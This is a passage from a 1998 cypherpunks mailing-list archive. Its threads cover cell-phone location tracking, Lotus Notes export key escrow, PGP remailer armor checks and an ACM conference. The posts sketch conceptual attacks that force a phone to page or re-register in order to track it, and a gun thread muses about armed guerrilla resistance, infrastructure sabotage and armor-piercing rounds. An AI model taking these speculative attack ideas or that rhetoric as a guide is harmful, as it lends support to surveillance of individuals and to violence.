attacks against one or a few people (well, actually against their SUs)
could be waged to track their fine-grain movement:

4) Continuously inform the SU that an incoming call is waiting.  The
   user would get an indication of this attack since the phone would
   "ring" to signal an incoming call.  OTOH, perhaps, there is a way
   to inform the SU that an incoming call is waiting without allowing
   the phone to enter the final state where it begins to "ring".  A
   detailed study of the air interface and SU implementations would be
   required to understand if the silent attack is possible.  This
   attack could target one SU.  Even if direct indications were not
   seen by the user, battery life would be shortened somewhat.

5) Continuously force the SU to "see" a different cell code, thus
   forcing it to continuously reregister.  The user would get no
   direct indication during the attack.  However, battery life would
   be shortened somewhat.  There may be protection in the SU to ensure
   a minimum time period between reregistrations.  However, this would
   just limit the fineness of the tracking.  Again, detailed study
   would be required.  This attack would appear to target multiple SUs
   in a given area.

If you assume your attacker is capable of (4), (5) and similar tricks
and you have something to hide, then I suppose turning your SU off and
on is a wise course of action.

However, the coarse-grain (pin-point location but only at widely
dispersed points in time) tracking afforded by (1) and (2) seem like
minimal threats.  If you are concerned by (3), then please remind me
why you are using the analog cellular phone system.

Regards,
Loren

[1] My informal study was conducted with a Motorola Micro TAC Lite SU
    and an HP 2.9 GHz Spectrum Analyzer on 1/5/98 and 1/6/98.  My
    analog cellular service provider is Ameritech in the Chicagoland
    area.

[2] Disclaimer: I personally work on research related to the iDEN
    system (which is an advanced form of digital cellular with
    dispatch services and packet data) being rolled out nationwide in
    the U.S. by Nextel along with other local and international
    operators.  Motorola recently shipped the millionth SU for iDEN.
    I am only speaking for myself.  I have never worked on analog
    cellular systems nor read its specification.

-- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(847) 576-7794				Call for verification of fingerprints.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Tue, 6 Jan 1998 18:50:14 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: cypherpunks and guns
Message-ID: <tw767nxj3q7.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



<daemon@ATHENA.MIT.EDU> (Wei Dai) writes:

> I don't understand why there is so much talk about guns here lately.
> Unless someone comes up with a weapon that has some very unusual economic
> properties, individuals cannot hope to compete with governments in the
> domain of deadly force. If we have to resort to physical violence, we've
> already lost!
> 
> Think about it: if we can defend ourselves with guns, why would we need
> crypto?

I am fairly certain that as an irregular army soldier I could inflict
a substantial amount of damage upon an occupying military.  With maybe
$20k in equipment and several hundred hours of training, you could make
life very difficult for any luckless squad that happens your way.  Multiply
that by 100 million armed citizens and you see that armed civilian
resistance *can* defeat an occupying army.

Certainly in times of "peace" information/infrastructure warfare is much
more cost effective for the guerilla -- but once they start sending armored
patrols around armed with 600 surplus M-16 rifles and having [un]official
rules of engagement which include sniper fire on the wives and children
of citizens not convicted of any crime, burning tens of people alive for
their religious beliefs, forcibly sodomizing suspects with wooden rods, and
passing laws which cripple the 1st by making it a crime to read, it's
perhaps worth looking at other methods of resistance. (wow, that approached
Hettingan length while having little in common with his style :)

Plus, I honestly believe certain people who lacked the foresight or desire
to use anonymity have increased the chances of illegal unconstitutional
government action against them.  It'll be a lot harder to quietly kill
someone and keep it out of the news if they're prepared to fight back
to the extent that I gather Tim May and others are prepared.  Even if
being armed does nothing more than let the world know they have declared
war against the constitution, it's worth it.

Me, I still plan to get out before high powered riflery becomes anything
other than a sport.  The Seychelles are looking remarkably tempting... 

(I still say steel core ammo is the way to go, especially in 5.56 NATO and
7.62 Soviet.  There exist plenty of vests which have rifle hardplate to
stop those rounds -- even 7.62 NATO rounds.  7.62 NATO AP/API, though,
is a bit tougher, buying you substantial time)    

Hacking on Eternity DDS,
Ryan
[Not actually a gun toting lunatic, nor does he play one on TV, but
 rather keeps them in a safe, and carries knives instead.  Yay Massachusetts.
 I hope this does not spark a discussion of how to stop a government
 assault force armed with only a knife (hint: the answer is not "in parallel")]

[*ObCrypto* (it's getting really hard to do this every time):
AOLserver (a nice web server formerly from GNN/navisoft) punted their
128bit SSL module distribution *EVEN TO US CITIZENS* due to commerce
department fuckedness.  Anyone know where I could get a copy?  It would
really suck to have to patch the 40bit one into a 128bit version, since they
do not distribute source.  Sigh.  But I've started to use it for insecure
stuff because it's cheaper than Stronghold (read: free) and does some cool
database stuff easier than apache.  And (cool db stuff + free) is more
important than (secure) or (secure and easily configured and supported)
for this.]

-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 6 Jan 1998 20:14:06 +0800
To: cypherpunks@toad.com
Subject: Letter on Jim Bell
Message-ID: <1.5.4.32.19980106115810.0074e354@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a recent letter on Jim Bell/AP/IRS harassment
by long-time friend Bob East at:

   http://www.charm.net/~joabj/belet.htm

Offered by Joab Jackson, who wrote the recent story 
posted here for the Baltimore City Paper.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 7 Jan 1998 01:14:06 +0800
To: weidai@eskimo.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <199801061655.IAA23107@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> 
> I don't understand why there is so much talk about guns here lately.
> Unless someone comes up with a weapon that has some very unusual economic
> properties, individuals cannot hope to compete with governments in the
> domain of deadly force. If we have to resort to physical violence, we've
> already lost!
> 
> Think about it: if we can defend ourselves with guns, why would we need
> crypto?

I agree- the fedz will always have better firepower than any of
us.  Tim's strategy of letting them know that he won't take
a 'no-knock' raid sitting down might keep them honest.  Or it
might make them come in with 80 special agents and a heliocopter to
drop napalm on his house.

I'm not going to spend a lot of time setting up defenses against a
massive police attack- the costs are too high (expensive weapons, time
practicing on the range) and the hassle is great... who wants to
live barricaded in their house, jumping at every noise?

Better to do the things that we're good at- writing code, cracking
codes, writing about crypto-liberation ideas.

However, guns are good for a couple things- they're still useful
against non-government thugs, and they're a hell of a lot of fun.


-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 7 Jan 1998 02:01:00 +0800
To: Tim May <cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <3.0.5.32.19980106095312.007b8eb0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:54 AM 1/6/98 -0800, Tim May wrote:
>At 12:51 AM -0800 1/6/98, Wei Dai wrote:
>>I don't understand why there is so much talk about guns here lately.

Wei, Tim's response, though correct, is too serious.  The real reason, I am
inferring as I was not the initiator, was humor.

This list tolerates a fair amount of crap, including spam and random
ad-hominems.
This is a result of the openness required to permit anonymous posts as has 
been explained in the last month or so.

I have considered this 1. an occasional demonstration of
crypto issues, esp. anonymity and authentication 2.  just typical net.abuse.
(There is also some oddness going on apparently between Vulis and others on
this
list, which Vulis didn't deny was spoofed when I asked.  I don't know why,
as V. seems to be libertarian, if homophobic.)

There are also various humorous threads and banter that occurs.  The gun-troll
was part of that.  Of course, it was a respectable question and answered well,
although TM's answer tended towards the expensive, but Intel has done well.
Both the question itself on this list, and the dryness of the answers, were
amusing.

The body-armor question is humorous also, esp. following the gun side-thread.

Of course, your milage may vary.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 7 Jan 1998 02:24:08 +0800
To: Ryan Lackey <weidai@eskimo.com>
Subject: Re: cypherpunks and guns
In-Reply-To: <Wei Dai's message of Tue, 6 Jan 1998 00:51:36 -0800>
Message-ID: <3.0.5.32.19980106100807.007ab610@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 05:28 AM 1/6/98 -0500, Ryan Lackey wrote:
>
>I am fairly certain that as an irregular army soldier I could inflict
>a substantial amount of damage upon an occupying military.  With maybe
>$20k in equipment and several hundred hours of training, you could make
>life very difficult for any luckless squad that happens your way.  Multiply
>that by 100 million armed citizens and you see that armed civilian
>resistance *can* defeat an occupying army.

A distributed decentralized terrorist group can trash almost any country's
infrastructure as well.  The gov't knows this, but if it were to start
happening (or their intelligence indicated it might) guards would be 
sent to the power stations, transformers, water works, radio relays, 
NAPs, refineries, etc.  

These guards would be physical, guarding physical resources against 
physical threats.  They would be able to resist smaller threats.
As you say, if outnumbered, they're eventually hosed.

The recent gov't interest in 'cyber' threats against infrastructure
reflects the fact that the government doesn't dominate the digital domain,
and can't protect it with troops, and needs it to run civilization and its
armies.





------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 7 Jan 1998 00:25:39 +0800
To: Andy Dustman <andy@neptune.chem.uga.edu>
Subject: Re: PGP-out-only vs. hashcash aware remailers?
In-Reply-To: <Pine.LNX.3.94.980105104829.6085O-100000@neptune.chem.uga.edu>
Message-ID: <199801061630.LAA15383@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.LNX.3.94.980105104829.6085O-100000@neptune.chem.uga.edu>, on
01/05/98 
   at 11:14 AM, Andy Dustman <andy@neptune.chem.uga.edu> said:

>A couple problems: PGP (2.6.x) doesn't seem to have an option to only
>de-armor

PGP -da [filename]

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLJZ9o9Co1n+aLhhAQHtGAP+LCyT+AGEcQoatO6vGAzj1qAInO9eSb9a
Lhil7PdLxJFJO7FrkkpEkUSq+thIpKU5H+Kfo/qwq+fkeIKlgh8EAlog4bLTaTg8
yW2ZAOn1qVY5xZHppvIn946WE0/IxFCXee5EfzrnhchvpzVn4JXtYkWNf0wqP8it
vPOsqKr3XQ4=
=Vx+s
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Wed, 7 Jan 1998 00:10:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Mobile phones used as trackers
In-Reply-To: <199801012054.PAA25297@users.invweb.net>
Message-ID: <34B27F22.7C07@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Loren J. Rittle wrote:

> If you assume your attacker is capable of (4), (5) and similar tricks
> and you have something to hide, then I suppose turning your SU off and
> on is a wise course of action.

Another attack that was recently described to me by someone in the industry
is to setup a three-way conversation, which basically is a cellular phone
tap.  The conversation could be split within the cell network to a silent
party more interested in your communications than your location.

--David Miller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 03:19:49 +0800
To: cypherpunks@toad.com
Subject: ACM conference on computer-related policy (DC, 5/98)
Message-ID: <Pine.GSO.3.95.980106111057.22930G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Tue, 6 Jan 1998 11:10:49 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship-announce@vorlon.mit.edu
Subject: ACM conference on computer-related policy (DC, 5/98)

[The best policy for the Net is probably no policy, or at most a hands-off
one. We don't have national "policies" for how we should regulate, for
example, newspapers or bookstores, and we don't need such policies for the
Net. On universal service, we already have Internet connections that are
cheaper than cable TV; on copyright, the safest course is to let federal
courts decide; on crypto, most agree that the current "policy" is
misguided at best. --Declan]

***************

    ASSOCIATION FOR COMPUTING (ACM) ANNUAL CONFERENCE

                * * *  POLICY98  * * *
         "Shaping Policy in the Information Age"

            Washington, DC, Renaissance Hotel
                    May 10-12, 1998

                  Preliminary Notice

      For Conference and Registration information see:
         http://www.acm.org/usacm/events/policy98/

The ACM Annual Conference will focus on public policy issues
affecting future applications of computing.  Our goal is to
forge stronger links between computing professionals and policy
makers.  Attendees will interact with prominent leaders from
academia, industry, Congress, and Executive agencies, and
participate in debates on policy issues including Universal
Access, Electronic Commerce, Intellectual Property, and
Education Online.

The conference will promote more regular engagement of computing
professionals in democratic processes related to productive use
of computing and information processing innovations.  A blend of
technical skills and policy insights are essential to cope with
the inherent opportunities and dangers of any transformational
technology.  Continuing collaborations between computing
professionals and policy makers will benefit citizens, consumers,
entrepreneurs, researchers, and students.  You can make a difference!

May 10: Ethical and social impacts papers and panels
May 11-12: Public policy panels and featured speakers

All Policy98 attendees are invited to the Annual ACM Awards Banquet
on Sunday evening May 10th, and a conference reception on Monday
evening May 11th.

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
PANEL TOPICS AND COORDINATORS
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Universal Service: Ollie Smoot
What can be done to promote widespread access to the benefits of
the Internet? What is the role of government and the role of the
private sector in wiring schools, libraries, and medical facilities?

Electronic Commerce: Jim Horning
How much public policy does EComm need?  What problems would
inadequate, excessive, or misguided policies cause?  Can compromises
in areas like fair trade practices, fraud prevention, security, privacy,
law enforcement, and taxation advance the interests of all stakeholders?

Intellectual Property in Cyberspace: Pam Samuelson
What will be the impact of the WIPO agreements on copyright in
cyberspace? How should intellectual property be protected  and what
safeguards are necessary to protect libraries and academic institutions?

Education Online: Charles N. Brownstein
The Internet offers unparalleled opportunities for learning and teaching.
What public policy and technical challenges must be met to realize
these prospects?


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
CONFERENCE CO-CHAIRS
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Ben Shneiderman, USACM (U.S. Public Policy Committee)
C. Dianne Martin, SIGCAS (ACM Special Interest Group
                       on Computers & Society)

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
PROGRAM COMMITTEE CHAIRS
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Marc Rotenberg, Public Policy
Keith Miller, Ethics and Social Impacts

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
REGISTRATION INFORMATION
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
For more information, contact:  policy98@acm.org
  or to register electronically, see:
    http://www.acm.org/usacm/events/policy98/reginfo.html
Early registrants and ACM members receive discounts.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 7 Jan 1998 01:45:57 +0800
To: rittle@comm.mot.com
Subject: Re: Mobile phones used as trackers
In-Reply-To: <199801061007.EAA28104@supra.rsch.comm.mot.com>
Message-ID: <199801061749.MAA16034@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801061007.EAA28104@supra.rsch.comm.mot.com>, on 01/06/98 
   at 05:07 AM, "Loren J. Rittle" <rittle@supra.rsch.comm.mot.com> said:

>In article <199801012054.PAA25297@users.invweb.net>,
>"William H. Geiger III" <whgiii@invweb.net> writes:

>> It is my understanding that they can still track you with the cell phone
>> turned off so long as there is power going to the box (most auto cell
>> phones are hardwired into the cars electrical system).

>This is the funniest thing I have read in some time.  Assuming you watch
>the show, I think you may have watched too many episodes of the X-Files
>(TM).

The point I was trying to make, and you seemed to have missed, is that
just because you turn off the switch and the lights are not flashing and
blinking does not mean that power is not going to some of the circuits.

Take the following into account:

1) Location Tracking via Cell Phone is currently available using equipment
in place.

2) FCC mandates for Location tracking under the cover of 911 service

3) In field testing being done in several cities.

4) Lojack systems in place in several cities.

5) Systems in development for continuous traffic monitoring in the major
cities for automated traffic management to address the problems of "rush
hour" traffic.

6) GPS systems being built into productions vehicles at the factory.

It seems only natural to merge these into one piece of equipment using one
communication infrastructure. I think that if you take a closer look at
where various technologies and regulations are going to see that this is
less "X-File" like than you may think.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLJsa49Co1n+aLhhAQENDwQAg93KFwtcSlKX2MB/W/zaQ1DoPtPoo1/+
69qd8v9fTz35IOr8hKLiwwSf1jxqJNOMasU1jyjQtmPqZLVJFS6vQdgbj+9mcRaQ
VKL48HrmiGasEFYXlsVP7qBSPxYP63qxz3gs0zKlKVLrZ6dO+0dt+WXdc1lYCcaJ
a9BM9B3w/Pw=
=dULr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Wed, 7 Jan 1998 04:15:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Silly Shrinkwrapped Encryption
Message-ID: <9801062004.AA18375@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian says:
> Could someone poke through Lotus Notes with a debugger and see exactly how
> this "giving 24 bits to the government" is implemented? 

Lotus produced a "backgrounder" called "Differential Workfactor Cryptography"
when they first promulgated the 64/40 stuff.  It says (in part):

	We do that by encrypting 24 of the 64 bits under a public RSA key
	provided by the U.S. government and binding the encrypted partial
	key to the encrypted data.

I haven't seen the USG RSA key -- if it's 512 bits, that would be a humorous
next factoring target.

	Jim Gillogly
	15 Afteryule S.R. 1998, 20:02
	12.19.4.14.15, 12 Men 13 Kankin, Seventh Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 7 Jan 1998 01:04:53 +0800
To: Salvatore DeNaro <Salvatore_DeNaro@usccmail.lehman.com>
Subject: Re: 800 pound GorillaSoft
In-Reply-To: <00456D9D.1576@usccmail.lehman.com>
Message-ID: <Pine.SUN.3.96.980106120244.2112C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Jan 1998, Salvatore DeNaro passed me this url:

 http://www.motherjones.com/mother_jones/JF98/burstein.html

"But instead of waiting for a ruling on the case, the BSA abruptly dropped
the suit in the fall of 1997. The BSA receives funding from most of the
top software companies but appears to be most heavily funded by Microsoft.
And, according to Antel's information technology manager, Ricardo
Tascenho, the company settled the matter by signing a "special agreement"
with Microsoft to replace all of its software with Microsoft products...."



Happy happy joy joy.  Microsoft saves a pirate by assimilating it.
Resistance is futile. You will sell NT. :(
 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 7 Jan 1998 02:16:27 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: fwd: The Swedes discover Lotus Notes has key escrow! (Win Treese)
In-Reply-To: <Pine.SUN.3.96.980106120946.2112D-100000@beast.brainlink.com>
Message-ID: <199801061821.NAA16341@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.SUN.3.96.980106120946.2112D-100000@beast.brainlink.com>, on
01/06/98 
   at 12:11 PM, Ray Arachelian <sunder@brainlink.com> said:

>Lotus, a subsidiary of the American computer giant IBM, has negotiated a
>special solution to the problem.  Lotus gets to export strong
>cryptography with the requirement that vital parts of the secret keys are
>deposited with the U.S. government.  ``The difference between the
>American Notes version and the export version lies in degrees of
>encryption.  We deliver 64 bit keys to all customers, but 24 bits of
>those in the version that we deliver outside of the United States are
>deposited with the American government.  That's how it works today,''
>says Eileen Rudden, vice president at Lotus.

I have 2 problems with this outside of the fact they are doing it:

1) 64 bits is too weak.

2) why should we trust them that it is only the export versions they are
giving the 24bit to the government on??

Yet *another* reason not to use Lotus Bloats.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLJ0AY9Co1n+aLhhAQH/ugP/c98Sq7gCiXV8P045MyJZbcGmJGmD1IeX
SgQAhCrThv8bmou+stgJfoYClaDQ1ozbyGyCuJXgCgp/AHhUjEuDLGxIgAzRTuHX
V3vNSvNhW3FHMVSG1+UGylchaZzwhyo036frJrc3zxGXPGY142Y1BEW+4Zeoa1NN
YPw0QYYnxnY=
=k6PK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 7 Jan 1998 01:12:53 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: fwd: The Swedes discover Lotus Notes has key escrow! (Win Treese)
Message-ID: <Pine.SUN.3.96.980106120946.2112D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



(From the SpyKing Security Mailing list)

2)From: Mike G <mgevaert@bfree.on.ca>
Subject: Lotus Privacy Problems

This was taken from the Computer Privacy Digest 1/4/98 V12#00

Very interesting.

The Swedes discover Lotus Notes has key escrow! (Win Treese)

The article describes the reaction when various people in the Swedish
government learned that the Lotus Notes system they were using includes
key escrow.   They were apparently unaware of this until Notes was in
use by thousands of people in government and industry.

Besides being an interesting reaction to key escrow systems, this
incident reminds us that one should understand the real security of a
system....

  Secret Swedish E-Mail Can Be Read by the U.S.A.  
  Fredrik Laurin, Calle Froste, *Svenska Dagbladet*, 18 Nov 1997

One of the world's most widely used e-mail programs, the American Lotus
Notes, is not so secure as most of its 400,000 to 500,000 Swedish users
believe.  To be sure, it includes advanced cryptography in its e-mail
function, but the codes that protect the encryption have been
surrendered to American authorities.  With them, the U.S. government
can decode encrypted information.  Among Swedish users are 349
parliament members, 15,000 tax agency employees, as well as employees
in large businesses and the defense department.  ``I didn't know that
our Notes keys were deposited (with the U.S.).  It was interesting to
learn this,'' says Data Security Chief Jan Karlsson at the [Swedish]
our Notes keys were deposited (with the U.S.).  It was interesting to
learn this,'' says Data Security Chief Jan Karlsson at the [Swedish]
defense department.  Gunnar Grenfors, Parliament director and daily
e-mail user, says, ``I didn't know about this--here we handle sensitive
information concerning Sweden's interests, and we should not leave the
keys to this information to the U.S. government or anyone else.  This
must be a basic requirement.''

Sending information over the Internet is like sending a postcard--it's
that simple to read these communications.  When e-mail is encrypted, it
becomes unintelligible for anyone who captures it during transport.
Only those who have the right codes or raw computer power to break the
encryption can read it.  For crime prevention and national security
reasons, the United States has tough regulations concerning the level
of crytography that may be exported.  Both large companies and
intelligence agencies can already--in a fractions of a second--break
the simpler cryptographic protections.  For the world-leading American
computer industry, cryptographic export controls are therefore an ever
greater obstacle.  This slows down utilization of the Internet by
businesses because companies outside the U.S.A. do not dare to send
important information over the Internet.  On the other hand, the
encryption that may be used freely within the U.S.A. is substantially
more secure.

Lotus, a subsidiary of the American computer giant IBM, has negotiated
a special solution to the problem.  Lotus gets to export strong
cryptography with the requirement that vital parts of the secret keys
are deposited with the U.S. government.  ``The difference between the
American Notes version and the export version lies in degrees of
encryption.  We deliver 64 bit keys to all customers, but 24 bits of
those in the version that we deliver outside of the United States are
deposited with the American government.  That's how it works today,''
says Eileen Rudden, vice president at Lotus.

Those 24 bits are critical for security in the system.  40-bit
encryption is broken by a fast computer in several seconds, while 64
bits is much more time-consuming to break if one does not have the 24
bits [table omitted].  Lotus cannot answer as to which authorities have
received the keys and what rules apply for giving them out.  The
company has confidence that the American authorities responsible for
this have full control over the keys and can ensure that they will not
be misused.

On the other hand, this (assurance) does not matter to Swedish
companies.  On the contrary, there is a growing understanding that it
would be an unacceptable security risk to place the corporation's own
``master key'' in the hands of foreign authorities.  Secret information
can leak or be spread through, for example, court decisions in other
countries.  These concerns are demonstrated clearly in a survey by the
SAF Trade and Industry security delegation.  Some 60 companies answered
the survey.  They absolutely do not want keys deposited in the U.S.A.
It is business secrets they are protecting.  These corporations fear
that anyone can get a hold of this information, states Claes Blomqvist
at SAF.

Swedish businesses are also afraid of leaks within the American
authorities.  The security chief at SKF, Lars Lungren, states: ``If one
has a lawful purpose for having control over encryption, it isn't a
problem.  But the precept is flawed: They ought to monitor
(internally), but the Americans now act as if there are no crooks
working within their authorities.''

In some countries, intelligence agencies clearly have taken a position
on their country's trade and industry.  Such is the case in France.
One example, which French authorities chose to publicize, was in 1995
when five CIA agents were deported after having spied on a French
telecommunications company.

Win Treese <treese@openmarket.com>

  [The Lotus Notes crypto scheme is one that I have familiarly been
  calling ``64 40 or fight!'' (in a reference to a slogan for an early
  U.S. election campaign border-dispute issue many years ago.  PGN]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Tue, 6 Jan 1998 09:46:32 +0800
To: "'Steve Schear'" <cypherpunks@toad.com>
Subject: RE: Location Escrow anyone ?
Message-ID: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980106012148Z-5016@ixf2m1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi All,
>
>> 800 MHz analog may be the most difficult. GSM perhaps can reach 500 meteres
>>under ideal conditions
>> (Andreas Bogk).  IS-95/CDMA probably a bit better than GSM due to the very
>>high data (chip) rate and
>> spread spectrum's better multipath characteristics, although the system's
>>multipath performance most
>> improves communications not ranging (Phil Karn, Qualcomm).
>
>
>GSM doesn't use spread spectrum?
>
>Either way, I'd imagine that the accurate time domain division used with GSM
>would provide
>the Telco's with something a lot better than 500 meters.
>
>Some cells where I live aren't much further apart than 500 meters.	:)
>
>Bye for now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@neptune.chem.uga.edu>
Date: Wed, 7 Jan 1998 01:43:05 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: PGP-out-only vs. hashcash aware remailers?
In-Reply-To: <199801061630.LAA15383@users.invweb.net>
Message-ID: <Pine.LNX.3.94.980106123510.6085V-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 6 Jan 1998, William H. Geiger III wrote:

> In <Pine.LNX.3.94.980105104829.6085O-100000@neptune.chem.uga.edu>, on
> 01/05/98 
>    at 11:14 AM, Andy Dustman <andy@neptune.chem.uga.edu> said:
> 
> >A couple problems: PGP (2.6.x) doesn't seem to have an option to only
> >de-armor
> 
> PGP -da [filename]

Well that would help a lot, then. Find the begin and end headers for the
PGP message, pipe it into pgp -da, throw away the output, check the exit
code, which should be set if the armor was invalid (or perhaps look at
stderr). Like I said, though, you could still make the armor valid by
correctly calculating the CRC, or even make PGP generate the armor with
the insult/flames/whatever in the output (just a matter of shifting some
bits around before armoring, could be done in perl). But this is certainly
not worth worrying about. 

Andy Dustman / Computational Center for Molecular Structure and Design
For a great anti-spam procmail recipe, send me mail with subject "spam".
Append "+spamsucks" to my username to ensure delivery.  KeyID=0xC72F3F1D
Encryption is too important to leave to the government. -- Bruce Schneier
http://www.athens.net/~dustman mailto:andy@neptune.chem.uga.edu   <}+++<


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEPAwUBNLJsUBOPBZTHLz8dAQFd8wfQhU4uMzLL8zHUXtHSeBLdHYPe66h6ZNw7
aMHntK3fz+6ZkpiTLb/iqGZKNm6pSueXz3CxbIytbTS+IwFpgRpZX/w2gz1Jw2hh
tRiB9pCIXSlnV5E9K5fsREZRGlRyj82J6n2yjrTOQWLlW+piAopbBz20ShyELBaA
